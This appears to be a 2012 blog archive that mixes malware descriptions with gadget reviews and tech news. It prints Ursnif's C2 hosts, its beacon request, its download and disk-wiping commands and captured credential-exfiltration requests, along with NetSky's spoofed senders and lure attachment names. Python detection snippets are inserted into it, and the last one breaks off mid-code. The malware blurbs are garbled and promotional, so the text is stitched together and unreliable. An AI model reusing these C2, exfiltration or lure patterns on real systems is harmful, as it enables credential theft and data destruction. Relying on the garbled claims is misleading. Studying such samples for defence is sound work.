Saturday, October 27, 2012

Trojan.Kryptik


Trojan.Kryptik is a horrible Trojan that will cause you many computer problems as well as vast amounts of irritation. Trojan.Kryptik is basically a generic detection for a very dangerous Trojan that has the ability to recreate itself again and again. Trojan.Kryptik carries very serious risk factors, including the ability to infect all computers that use the Windows operating system. As you can imagine, this means that the majority of the world's computer users are at risk of being infected by Trojan.Kryptik.

Trojan.Kryptik may go by the following names:
• TrojanKryptik
• Trojan Kryptik

Trojan.Kryptik may display the following symptoms:
• Your computer may decrease in speed.
• You may experience vast amounts of pop-ups.
• You may find unclassified processes running in Task Manager.
• Your browsing performance may decrease in speed.
• Files may reinstall themselves even after removal.
• Files may appear and disappear without you having done anything.

Trojan.Kryptik is extremely malicious because it is able to reinstall its files after they have been deleted. The fundamental problem with this is that it makes the manual removal process extremely hard. Trojan.Kryptik is also able to hide itself in running processes on your machine and to create multiple dangerous files on your system. Trojan.Kryptik is able to block any computer security related applications which you may have running on your machine. Trojan.Kryptik is also able to prevent security applications from entering the quarantine process, and to prevent some of its files from being updated in the definition database.

Trojan.Kryptik will only cause you problems and is better avoided. If you suspect that you may have Trojan.Kryptik running on your machine, then you need to remove it immediately. You have the option of the manual removal process or, alternatively, the automatic removal process. Be aware that if you choose the manual removal process, the risk of causing additional damage to your computer is high. It is seriously within your best interest to make use of the automatic removal process, which will both detect and remove Trojan.Kryptik for you. Remember to use an up-to-date, reliable and user-friendly spyware removal tool.


Thursday, October 18, 2012

About The HackTool

About The HackTool:Win32/Keygen

A computer virus is extremely dangerous for the health of the computer. It can exploit the working of your computer system. If you detect problems while working on your system, then your system is definitely infected with a harmful virus. HackTool:Win32/Keygen is classified as a harmful virus, one of the creations of remote hackers. As its name implies, it hacks your system and steals sensitive data without the user's knowledge or consent. It leaves malicious code in the system and records all your browsing activity.
HackTool:Win32/Keygen has evolved and expanded. It has infected millions of computers globally. It is also able to download additional viruses and tries to take over the whole system. CRCK_KEYGEN, Troj/Keygen and not-a-virus Keygen are its common aliases. It is a tricky virus which cannot be trusted. It actually promotes its own antivirus program. It has the capability to disable your updated antivirus. When you scan your system, it displays fake scanning reports and uses tactics to get you to buy its licensed version. If it traces your system, you would suffer great data loss. So try to stop it in its early phase. It is strongly recommended that you do not ignore its presence. Remove it quickly by using a powerful tool.
Number of Infections of HackTool:Win32/Keygen: HackTool:Win32/Keygen is very lethal and propagates very vigorously. According to experts, it could infect as many as 60 files at a time, which is quite high.
Operating System platforms infected by HackTool:Win32/Keygen: HackTool:Win32/Keygen is equally dangerous for all Windows systems. Windows operating systems including Windows XP, Vista, Windows 7 etc. are the soft targets of HackTool:Win32/Keygen infection.
Through Email attachments:
Freeware downloads and social plug-ins:
Through social file sharing:
Visiting Porn and Malicious sites:
The guidelines given below can help you to prevent HackTool:Win32/Keygen-like infections from entering a Windows system:
Use Advanced System Security Software: To keep the system running effectively without any interruption, it is mandatory to use highly advanced system security programs which can prevent unauthorized access.
Enable Firewall Settings: By enabling the firewall settings option on a Windows system, you will be able to stop malicious computer threats which are trying to gain access to the user's computer.
Make use of Strong Passwords over the Network: The use of strong passwords is very much recommended to maintain the security of the system.
Avoid Freeware and Shareware Downloads: It is necessary to avoid downloading freeware and shareware programs from the web, because many adware and malware programs enter the PC without the user's knowledge along with the files related to such programs.
Take Caution While Opening Attachments: It is suggested to avoid opening attachments coming from untrusted sources. If you do open such files, then you should first scan the entire system using an effective anti-virus program.
  

Tuesday, October 16, 2012

LG Optimus 4X HD

The Optimus LG 4X HD is the company’s first with a quad-core processor. But since the arrival of the Samsung Galaxy S3, will anyone give a 4X?

LG Optimus 4X HD review: Hands-on

Love


  • Classy styling
  • Great battery life
  • Gorgeous display

Hate

  • Not latest Android
  • Average camera
  • Low-rent widget icons
LG’s latest premium Android, the LG 4X HD, is a stylish machine. It has a crisp, clean design with neat details like the chrome edging in subtly varying widths and the rough, matte back. It’s not as wide as the Samsung Galaxy S3 and it doesn’t feel like a palm-stretcher as Samsung’s does, even though the screen is only 0.1in smaller.

Android phone makers can add their own styling to Google’s operating software and LG matches earlier LG blowers. This isn’t as sophisticated as Samsung’s or as gorgeous and feature-packed as HTC’s and the shortcut icons look cartoony on this hi-res display.
But the way the widgets shrink as they are swiped offscreen is cute. As is the lock screen which, as you stroke your finger across it, reveals the home screen in a circular window that moves with your finger. Neat. This phone, by the way, comes with Ice Cream Sandwich, not the very latest Jelly Bean software.

LG Optimus 4X HD: Build

There’s a fashion for phones with sealed battery units, to maximise cell power and minimise the space for the battery’s casing. But the 4X HD has a removable back (handy if you want to swap batteries). Some phones with pop-off backs can creak when you flex them but this one is solid and silent.
The power button on the top edge is perhaps a little too recessed for easy use, but the other button, the volume rocker on the left edge, is neatly hidden. It falls under the thumb naturally enough but is so discreet it’s hard to see when you’re looking directly at it.

LG Optimus 4X HD: Features

The 4X HD has the now standard resolution for smartphone snappers: an 8MP camera. There’s also a 1.3MP sensor facing front. Still shots were acceptable but not especially strong or instant – shutter lag was evident in lower-light shots.
Video was strong, however, with autofocus that worked well, despite what you may have read elsewhere. The facility to zoom in while shooting by pinching the screen was useful.

LG Optimus 4X HD: Screen

The 4.7in display on the LG 4X HD is one of the phone’s standout features. It has high pixel density (312ppi), so not much less than the iPhone 4S’s much-vaunted Retina Display. It’s sharp, then, but also bright and vividly coloured. It’s a pleasure to look at.

LG Optimus 4X HD: Performance

Quad core means speed, right? Well, it certainly seems to here. The phone is very responsive, from simple tasks to heavy ones conducted with lots of programs running. Pages load super-fast, apps open instantly. It’s very satisfying to use. The only downside comes when your data connection is slow but that’s not LG’s fault, of course.

LG Optimus 4X HD: Battery

This phone has a powerful battery, at 2150mAH it’s more powerful than the one in the Samsung Galaxy S3. As a result, it’s easily enough to see you through a full day’s usage, though we’d still recommend nightly recharging.

LG Optimus 4X HD: Verdict

The LG 4X HD is a slick, impressive phone that will last all day with ease and do everything at speed with no slowdown, no making you wait. The screen is great: rich and vibrant with plenty of pin-sharp detail.
And the styling is LG at its best – quirky but classy and in a case that fits well in the hand. LG’s biggest problem is that other phones – like the Samsung Galaxy S3 and the HTC One X – offer as much if not more. Still, it’s easier to hold than the Samsung

ASUS PadFone 2

 All the ASUS PadFone 2 UK specs, features plus details on the release date and price for the Android smartphone/tablet mash-up

The smartphone with tablet (or a tablet with a smartphone) is back and ASUS has called it, unsurprisingly, the PadFone 2. Hoping to solve all your mobile needs from one device, we've previously praised the Taiwanese firm for its brilliant Transformer tablet family, named the original ASUS PadFone in our Hot 100 and let’s not forget that it helped bring the T3 Award-winning Google Nexus 7 to life.
Can ASUS flex its muscles in the smartphone market? Here’s T3’s look at the key features of the PadFone 2 and how it matches up to its

Build and design

ASUS says it has completely redesigned the hybrid tablet and smartphone device to reduce the overall thickness and weight taking the combined bulk of the 10.1-inch tablet and 4.7-inch smartphone down to 649g from 853g. The handset is now heavier at 135g but at 9mm thick is a little slender, but not quite in the realms of the iPhone 5.
Docking the smartphone into its tablet-friendly body has now changed: the lid is gone, and a Micro-USB/HDMI hybrid connector now slides the handset into the back of the tablet, which should make it much easier to switch between the two modes.

Screen

While the tablet display is largely the same as the 10.1inch WXGA 1280x800 resolution one that featured on the first PadFone, the smartphone has jumped from a 4.3 inch to a 4.7-inch Samsung Galaxy S3-sized screen with 1280 x 720 HD resolution and Super IPS+ display technology to produce excellent viewing angles.
That should mean an improvement in the resolution department compared to the 960x540 qHD Super AMOLED screen on the first PadFone. Both tablet and smartphone screens boast Corning Fit Glass to improve picture sharpness and deliver a more vibrant colourful display.

Processor

With two devices to power, the PadFone 2 upgrades from a 1.5GHz dualcore Snapdragon processor to new S4 quadcore innards which along with 2GB of RAM should ensure it can handle the toughest tasks without breaking a sweat.

Operating System

Disappointingly, the PadFone 2 will feature Android 4.0 Ice Cream Sandwich just as the original did which means it misses out on the slickness of the latest Jelly Bean update. For those worried about apps working across both devices, ASUS claims that apps will be optimized to support both tablet and phone modes.

 

Camera

Taking care of pictures is a 13-Megapixel rear-facing camera (up from 8-Megapixels) which can also shoot 1080p full HD video at 30fps or 720p HD footage at 60fps. A wide f2.4 aperture will look after low-lit photography while the Burst mode can take up to 100 pictures snapping six shots per second whilst filming a bit like the HTC One X range and Samsung Galaxy S3 are capable of. There’s a 1.2-Megapixel front-facing camera, however there are no details as to quality (or appearance) of a camera for the PadFone Station.

Battery

Improving on both fronts, ASUS has swapped the 1,520mAh Lithium smartphone battery for a higher capacity 2,140mAh one, promising between 13-15 hours of playtime with the PadFone 2. The 5,000mAh capacity battery nestled in the PadFone 2 Station will get you around 36 hours of 3G talk time and has the ability to recharge the handset three times over.

Connectivity

The big news is that the PadFone 2 supports LTE, which means it will benefit from the increased speed of a 4G wireless connection, on top of existing 3G and Wi-Fi capabilities. Another new addition is NFC, which lets you share webpages, contacts and details about your favourite apps from Google Play, while only one data plan is required to use between devices.

Storage

Available in 16GB, 32GB and 64GB you’ll also have access to 50GB of ASUS WebStorage for free for two years which is a year shorter than was offered with the original PadFone.

Your Universe Online

Image Credit: Nintendo
redOrbit Staff & Wire Reports – Your Universe Online
Nintendo has slashed the price of its legacy Wii console to $129.99, and will begin including copies of both Wii Sports and Wii Sports Resort with the device, the company said on Monday.
The new, lower-priced package will include a black Wii, both games on a single disc, a black Wii Remote Plus and a Nunchuk controller. The new configuration, which will be widely available in the U.S. by October 28, will phase out the current $149 black hardware bundle that comes with New Super Mario Bros.
“Nearly six years after it launched, people are still attracted to the pure, inclusive fun of the Wii console,” said Scott Moffitt, Nintendo of America’s executive vice president of sales and marketing.
“A new suggested retail price and the inclusion of two great games make it an easy choice for families looking for a great value this holiday season.”
Nintendo’s move is the third official U.S. price drop in the Wii’s six-year history, and marks the first time that Wii Sports and Wii Sports Resort are included on a single disc.
The games include a variety of sports such as baseball, bowling, tennis, archery and basketball.
Separately, Nintendo’s upcoming Wii U system will begin shipping on November 18, just in time for the holiday shopping season. The console will come in two versions: a Basic Set with 8GB of storage that sells for $299.99, and a Deluxe Set with 32GB of storage that sells for $349.99.

Source: redOrbit Staff & Wire Reports - Your Universe Online

redOrbit (http://s.tt/1qbqc)

Microsoft Shows Off The Surface…

Image Credit: Microsoft
Michael Harper for redOrbit.com
When Microsoft took the stage last night in Los Angeles for their very special event to talk about their “tablet strategy,” it was pretty obvious they’d be announcing their own tablet. After all, All Things D — as they often do — announced as much last Friday.
Sure enough, after some brief back-patting, (wherein they boasted their long-tenured legacy as a hardware company…) they unveiled the Microsoft Surface. No, not THAT Surface. The new Surface is Microsoft’s very own tablet which not only signifies a strong push towards uniformity in concept and design, it also strongly signifies the possible end of some of their partnerships. Of course, the last part is pure conjecture, but solid conjecture nonetheless.
To begin, the Microsoft Surface comes in 2 different varieties and in two different sizes. Reminiscent to the way they sell their Windows Operating system (Currently they offer Windows 7 Home Premium, Windows 7 Professional and Windows 7 Ultimate) Microsoft said they will offer a Surface for Windows RT and a Surface for Windows 8 Pro.
The inimitable tech blog The Verge was able to get their hands on the tech sheets for these new tablet devices and found the Surface for Windows RT will be powered by an ARM chip and weighs in at 1.5 pounds in a svelte 9.3 mm thin frame. The Surface for Windows 8 Pro, on the other hand, is powered by Intel’s Ivy Bridge processor for a “Full Windows” experience. The latter variant of the Surface weighs 2 pounds and is 13.5 mm thin. Both versions of Surface for Windows feature a Kickstand—complete with satisfying Car-Door-Closing-Click—magnesium case, and will be available in 32 or 64 GB. The Surface for Windows 8 Pro, on the other hand, will be available in a 128 GB version.
Both versions carry the slots and ports people seem to be asking for these days, including USB 2.0 and 3.0 (on the Surface for Windows RT and Surface for Windows 8 Pro, respectively) as well as microSD and microSDXC, respectively. Those users willing to spring for the Surface for Windows 8 Pro model will also have the added option of a magnetic stylus which will attach to the side of the device.
Speaking of magnets, the Surface for Windows RT and Surface for Windows 8 Pro will each work with Microsoft’s new Touch Cover and Type Cover keyboards. Think Apple’s Smart Covers, but with keyboards attached. The Type Cover boasts a full, tactile keyboard with the addition of a full touch pad. The Touch Cover also features the same full touch trackpad, but uses a multitouch-style keyboard instead of actual, clicky-key action. Just like the Smart Covers before them, the Type Cover and Touch Cover for Surface attach via magnets on the side of the tablet.
Microsoft’s unveiling of a new piece of hardware is definitely an interesting move, especially since they’ve been pushing to get their partners — Asus, Dell, HP, Lenovo — on board with their new Windows RT and Windows 8 operating systems. When asked about this potential rift between the notoriously software-driven company and their hardware partners, Steve Ballmer said they only planned to “prime the pump” for the upcoming release of Windows 8. He also told The Verge the Microsoft Surface for Windows is “an important companion to the whole Windows 8 story. It’s an important piece; it’s not the only piece.”
After Microsoft showed off the device and its accessories — as well as a brief explanation of how much time they spent on making the kickstand sound like a car door — they had nothing else to reveal in the way of pricing or availability. In fact, it wasn’t until after the event that the always-ready team at The Verge was able to get a list of specs. (Still no word on battery life, however.) So, Microsoft’s Surface for Windows RT and Surface for Windows 8 Pro may be available at some point in the future (presumably “around” the Windows 8 launch for the RT, and “3 months after” for the Pro) at a “competitive” price point.
While we wait for all the unknowns to become known, we’ll be watching those partners responsible for bringing the Windows experience to the masses — Asus, Dell, HP, Lenovo and the gang — to see what their reaction to this news will be. Perhaps we’ll see some announcements in kind about a sudden switch to Android?

Source: Michael Harper for redOrbit.com

redOrbit (http://s.tt/1f2h0)

Dell XPS 15 review

Fusing raw power with good looks, the Dell XPS 15 is Windows’ answer to the Macbook Pro and one of the best laptops we’ve seen this year

Love

  • Awesome build quality
  • Excellent screen and speakers
  • Enough power for gaming

Hate

  • Average battery life
  • A bit on the heavy side
  • No internal SSD
If there was a Windows machine to rival the mighty MacBook Pro, the Dell XPS 15 would be it. Dell’s latest offering has bleeding-edge specifications, a fantastic HD screen and great usability. Of course, it’s all wrapped up in a gorgeous silver chassis typical of the XPS range.

Taking the fight to other top-tier laptops like the HP Envy 17 and the Sony S Series, the Dell XPS 15 boasts an Ivy Bridge processor, dedicated graphics and a full 1080p Gorilla Glass display. Trust us, the result is seriously impressive. 

Dell XPS 15: Features

Dell’s customary XPS chassis hasn’t changed drastically despite several updates. The silver brushed metal chassis still looks fantastic and is offset with the black interior, complete with an isolation-style backlit keyboard. There’s not a hint of cheap plastic, and the glorious screen is almost bezel-less, meaning that the XPS 15 could be mistaken for a 14-incher.

Elsewhere you’ll find a built-in Blu-ray drive, 8GB of RAM and a 1TB hard drive. There’s no solid state drive, so start-up can seem a bit sluggish – especially when compared to super speedy Ultrabooks – but once it’s out of the blocks this machine goes strong even under heavy strain from multitasking.

If there’s one criticism that could be levelled at the Dell XPS 15, it’s the weight, and while the Apple MacBook Pro has been on a diet, this 2.5kg model is still a burden to carry.

Dell XPS 15: Screen

Fans of 1080p high definition video need look no further than the XPS 15. Dell has crammed 1,920 x 1,080 pixels on to the 15-inch screen which has been crafted from Corning’s Gorilla Glass.

There’s very little reflection from the glossy finish and viewing angles are excellent thanks to the 350nit brightness.

Dell XPS 15: Performance

The Intel Ivy Bridge CPU inside the XPS 15 stormed through our benchmarking tests and totally outperformed even the top-level second generation Intel-powered laptops. No matter what programs you’re looking to run – from video editing software through to Minesweeper or Online Scrabble, this machine can handle it.

Our gaming benchmark scores were some of the highest on test, thanks to the Nvidia GeForce 640M processor with 2GB of dedicated video memory. The XPS 15 tapped out with the likes of Battlefield 3 on full detail settings, but Batman: Arkham City ran without any problems.

Dell XPS 15: Battery

We tested the XPS 15 out with some looped 1080p high definition video, on top of a high-performance benchmarking program and the battery gave out after 226 minutes of continuous use.
We expect any machine at this price point to hit well above the 200 minute mark – so in fairness we’d have to say this is an average result. We’d ideally like to see the XPS 15 pushing for 300 minutes. However, with conservative use you can probably squeeze five hours from this machine.

Dell XPS 15: Verdict

Criticising the Dell XPS 15 is a bit like taking a crack at Helen of Troy - we could do it, but history doesn’t remember such transgressions. If you’re looking for a laptop that combines enough power to multitask your most demanding programs and look good doing it, then you’ve arrived at the right review.

The amazing HD display, great usability and Ivy Bridge power are all standout highlights and make the Dell XPS 15 the inevitable Windows alternative to the Macbook Pro. This is easily one of the best laptops we’ve ever seen.

Apple iPhone 5 vs Samsung Galaxy S3

The Apple iPhone 5 takes on the Samsung Galaxy S3, but who comes out on top in this epic clash of the titans? We square up the specs to find out
Whether you love the sound of the new iPhone 5, or are massively underwhelmed by the latest Apple smartphone instalment, it's probably going to sell in its millions and have fanboys queuing outside Apple Stores across the world.
Fear not Android lovers, for the Samsung Galaxy S3 is an Android smartphone goliath that should prove worthy competition for the iPhone 5. The question is, does the S3 actually boast better features than the latest Apple blower? It's time for a smartphone spec showdown...

Apple iPhone 5 vs Samsung Galaxy S3: Build

Apple iPhone 5
Let’s start with the chassis because, let’s face it, that’s the only distinct visible change to differentiate it from its two previous family members. Grasp the frame in your hand and the first thing you’ll notice is the weight; it’s the lightest iPhone ever.

By a long way. At 112g, it’s 20% daintier than the iPhone 4S, 16% less butch than the Samsung Galaxy S3 and 14% lighter than the HTC One X. Reducing the SIM to weency, or ‘nano’, size has helped, minutely, as has making the shell out of anodised aluminium.

The brace of glass strips adorning the top and bottom of the rear give both the black/slate and white/silver models a premium feel but are actually employed to allow an uninterrupted phone signal. No-one wants another antennagate.

Samsung Galaxy S3
Available in 'Marble White' and 'Pebble Blue' (pebble... blue?!) and now titanium grey, the Galaxy S3 is sporting a curvier look than the iPhone 5. It actually looks far less like its older brother, and more closely resembles the Samsung Galaxy Nexus, both in size and contours, although the plastic finish on the back feels more premium than its predecessor. Measuring 136.6 x 70.6 x 8.6mm, the S3 is slightly longer, wider and fatter than the S2 (125.3 x 66.1 x 8.49mm), which may prove to be a little on the large side for some, although the extra thickness may actually make the S3 slightly easier to hold and less likely to slip from your hand, particularly when taking a photo. At 133g, the S3 is very slightly heavier than the S2, although only by 3 grams, so it's barely noticeable.

Apple iPhone 5 vs Samsung Galaxy S3: Screen

Apple iPhone 5
The four-inch screen, which we’ll come onto in detail shortly, is Apple’s belated nod to the industry trend for bigger displays, and means the iPhone 5 now stands a proud 123.8mm tall – width remains the same at 58.6mm. The extra screen real-estate is welcome, though smaller-handed iPhone users might struggle to reach the standby button with a forefinger while holding it in a natural position. They might even have to stretch for the extra top row of apps. Just hold it a different way, perhaps.
It’s still lovely and Retina; it now boasts 326ppi and a resolution of 1136x640; it’s equally as bright and slightly richer in colour. There’s space for a whole extra row of apps – woop! – and tasks can still be performed with one hand. The main benefit is that you can just see more. Web pages are longer, movies are wider, though many we found from iTunes and YouTube still have to be stretched or cropped to fill the screen, the photo viewing area is bigger (just) and Apple’s own, optimised apps make good use of the extra space.

Samsung Galaxy S3
The S3 one-ups the iPhone 4S and HTC One X on screen size, with an enormous 4.8-inch HD Super AMOLED screen, which displays at a maximum resolution of 720 x 1280. At 306 pixels per inch, the screen is slightly below the quality of the HTC One X and the iPhone 4S but frankly, 306ppi is still eye-searing stuff. Everything that we said about the HTC looking great because of its size is even more true of the Samsung Galaxy S3. Once again the screen uses Super AMOLED technology, to keep the viewing angle as wide as possible.

IBM Bans Use of Siri on Employees’ iPhones

New advances in technology for smartphones, tablets and computers, while eagerly embraced by users, often bring new risks of data breaches or loss of data privacy. Companies that allow their employees to use their own personal devices for work-related purposes may be especially vulnerable. Because of these risks, IBM recently decided to ban the use of Siri — the powerful voice-recognition software on the new iPhone — on employees’ phones.

Win32/NetSky.Q

Win32/NetSky.Q is an internet worm spreading via e-mail messages, P2P networks or shared network drives.
Note: In the following text, the symbolic name %windir% is used in place of the name of the directory in which the Windows operating system is installed. Of course, this may differ from installation to installation. The subdirectory System or System32 located in %windir% is referred to as %system%.
The worm is an executable that is nearly 29 kilobytes long. Upon execution it copies itself into the %windir% directory using the name "FVProtect.exe".
It also creates a file called "userconfig9x.dll" that is 26 kB long. This dynamic library file is then executed.

In order to be run every time Windows starts, the worm creates a Registry entry called "Norton Antivirus AV" in the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The new entry contains the path to "FVProtect.exe".

The following Registry entries are removed by the worm:
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\PINF
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\au.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d3dupdate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gouday.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\srate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ssate.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon.exe
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\Video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DELETE ME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\direct.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\jijbl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msgsvr32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sentry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\service
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taskmon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\video
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Services Host
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winupd.exe
This way, some older worms can be deactivated, if present on the system.

The following files are created in the %windir% directory: base64.tmp, zip1.tmp, zip2.tmp, zip3.tmp, zipped.tmp.
These are used when the e-mail messages are composed.

The worm searches all local disks for directories that contain any of the following strings in their names:
bear
donkey
download
ftp
htdocs
http
icq
kazaa
lime
morpheus
mule
my shared folder
shar
shared files
upload
The messages used for spreading the worm are composed using a long list of strings. The address of the sender is either randomly picked from the harvested addresses, or it may be one of the addresses contained in the worm:
abuse@gov.us
noreply@paypal.com
support@symantec.com
Subject of the message is chosen from the list below:
-do0-i4grjj40j09gjijgp
0i09u5rug08r89589gjrg
Administrator
approved
Congratulations!
corrected
Do you?
Body of the e-mail contains one of the following messages, but it can also be blank.
9u049u89gh89fsdpokofkdpbm3-4i
Are you a spammer? (I found your email on a spammer website!?!)
Authentication required.
Bad Gateway: The message has been attached.
Best wishes, your friend.
Binary message is available.
Can you confirm it?
Congratulations!, your best friend.
Delivered message is attached.
Do not visit this illegal websites!
Encrypted message is available.
The attachment can either be an executable or a ZIP archive. If it's an EXE file, it has two extensions. The first one is either ".doc" or ".txt", and the other is ".exe", ".scr" or ".pif".

If the attachment is a ZIP archive, its extension is ".zip". The archive contains the Win32/Netsky.Q executable. The file inside the archive can have three different names:
document.txt .exe
data.rtf .scr
details.txt .pif
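
A mail-gateway check for the attachment naming described above, added here as an example (it is not code from the original description). The function names are hypothetical and the sample attachments are constructed in memory; the decoy and executable extensions are the ones listed in the text.

```python
import io
import re
import zipfile

# Decoy extension, optional whitespace padding, then an executable extension,
# as in the attachment names described above ("document.txt .exe").
DOUBLE_EXT = re.compile(r"\.(doc|txt|rtf)\s*\.(exe|scr|pif)$", re.IGNORECASE)


def is_double_extension(name):
    """True if a file name hides an executable extension behind a document one."""
    return DOUBLE_EXT.search(name.strip()) is not None


def suspicious_names(filename, payload):
    """Return the names that match, looking one level inside ZIP attachments."""
    hits = []
    if is_double_extension(filename):
        hits.append(filename)
    if filename.lower().endswith(".zip"):
        try:
            with zipfile.ZipFile(io.BytesIO(payload)) as archive:
                hits += [n for n in archive.namelist() if is_double_extension(n)]
        except zipfile.BadZipFile:
            # An archive the gateway cannot read should be held, not passed.
            hits.append(filename + " (unreadable archive)")
    return hits


def make_zip(member, data=b"constructed sample, not malware"):
    """Build a small in-memory ZIP so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr(member, data)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed attachments for illustration.
    samples = [
        ("report.doc.scr", b""),
        ("mail.zip", make_zip("details.txt      .pif")),
        ("photos.zip", make_zip("holiday.txt")),
        ("broken.zip", b"not a zip"),
    ]
    for name, payload in samples:
        print(name, "->", suspicious_names(name, payload))
```

The whitespace between the two extensions is matched explicitly because the padding pushes the real extension out of view in a narrow file-name column.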



Trojan.Spy.Ursnif.F


Spreading: medium
Damage: high
Size: approx 50k
Discovered: 2010 Oct 20

SYMPTOMS:
Extra HTTP traffic.
TECHNICAL DESCRIPTION:
      Trojan.Spy.Ursnif is malware that is able to steal personal information and control the infected computer.
      It finds out the type of browser (iexplorer, firefox, safari, chrome, opera); this information is used later for stealing specific passwords.
      It takes a snapshot of all the processes, injects itself into iexplore or firefox, and hooks some functions (InternetReadFile, InternetWriteFile, CreateProcess, HttpSendRequest) to intercept browser traffic.
      The backdoor behaviour starts when it connects to a server that appears under different host names: rettinasl.com, hasterulits.com, thecargotime.com, tryfindithere.com. From time to time it sends requests to the server. The request has a standard form:
    GET /cgi-bin/cmd.cgi?user_id=2806922672&version_id=2037028&passphrase=fkjvhsdvlksdhvlsd&socks=0&version=2037028&crc=00000000 HTTP/1.1

    The version id is memorized in a registry key:    
        Subkey = HKCU\Software\AppDataLow\{0a7cdb08-42c7-a17a-bc91-b0554eeb624f}
        Value    = Version
        Data      = Hex:001F1524 , Decimal:2037028
    The user_id is random.

    If the request succeeds and the connection is established the malware takes control:
      - it receives commands:
            - download               - DL_EXE=http://ne[removed].cn/sol.exe /DL_EXE_ST=http://ne[removed].cn /sol.exe ;
            - kill windows           - KILL (writes a buffer of size 0x10000, the module of the current process, to "\\.\C:");
            - reboot system          - REBOOT;
            - take screenshots       - SCREENSHOT;
            - delete cookies         - CLEAR_COOK;

      - when the user logs on to different internet accounts, it sends the private information (user_name, passwords) to a remote location:
            example wireshark capture:

            POST /cgi-bin/forms.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------2b01852b01852b0185
            User-Agent: IE
            Host: tryfindithere.com
            Content-Length: 337
            Cache-Control: no-cache
            ----------------------------2b01852b01852b0185
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
             URL: http://fa[removed]war.com/index.php
            login_username=TEST&login_password=TEST&serverid=1&submitit.x=89&submitit.y=23
     
        - it downloads an encrypted buffer to a memory location; the buffer contains:
            - the names of some bank websites: millenniumbcp.pt, santandertotta.pt, grupobanif, caixaebanking.cgd.pt;
            - some JavaScript code to identify and steal passwords, user names and card PINs from those bank websites;

        - also, when the user logs on to those bank websites, screenshot pictures are sent to a remote location:
            example wireshark capture:
         
            POST /cgi-bin/ss.cgi HTTP/1.1
            Content-Type: multipart/form-data; boundary=--------------------------905c4c905c4c905c4c
            User-Agent: IE
            Host: thecargotime.com
            Content-Length: 146030
            Cache-Control: no-cache
            ----------------------------905c4c905c4c905c4c
            Content-Disposition: form-data; name="upload_file"; filename="2806922672.2037028"
            Content-Type: application/octet-stream
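
Because the server appears under different host names, detection is more durable when it keys on the request shape. The following is an added example (not part of the original description) that flags a client whose upload file name reuses the user_id and version_id of an earlier check-in; the record layout, function names and hosts are assumptions, and the records are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

BEACON_PATH = "/cgi-bin/cmd.cgi"
UPLOAD_PATHS = {"/cgi-bin/forms.cgi", "/cgi-bin/ss.cgi"}
BEACON_KEYS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}
UPLOAD_NAME = re.compile(r"^(\d+)\.(\d+)$")  # filename="<user_id>.<version_id>"


def beacon_ids(method, url):
    """Return (user_id, version_id) if the request has the check-in form."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    if method != "GET" or parts.path != BEACON_PATH or set(query) != BEACON_KEYS:
        return None
    return query["user_id"][0], query["version_id"][0]


def upload_ids(method, url, filename):
    """Return (user_id, version_id) taken from an upload's file name."""
    match = UPLOAD_NAME.match(filename or "")
    if method != "POST" or urlsplit(url).path not in UPLOAD_PATHS or not match:
        return None
    return match.group(1), match.group(2)


def infected_clients(records):
    """Clients whose upload reuses the ids of one of their earlier check-ins."""
    seen, flagged = set(), []
    for client, method, url, filename in records:
        ids = beacon_ids(method, url)
        if ids:
            seen.add((client, ids))
        ids = upload_ids(method, url, filename)
        if ids and (client, ids) in seen and client not in flagged:
            flagged.append(client)
    return flagged

# Constructed proxy records (placeholder hosts): client, method, URL, file name.
RECORDS = [
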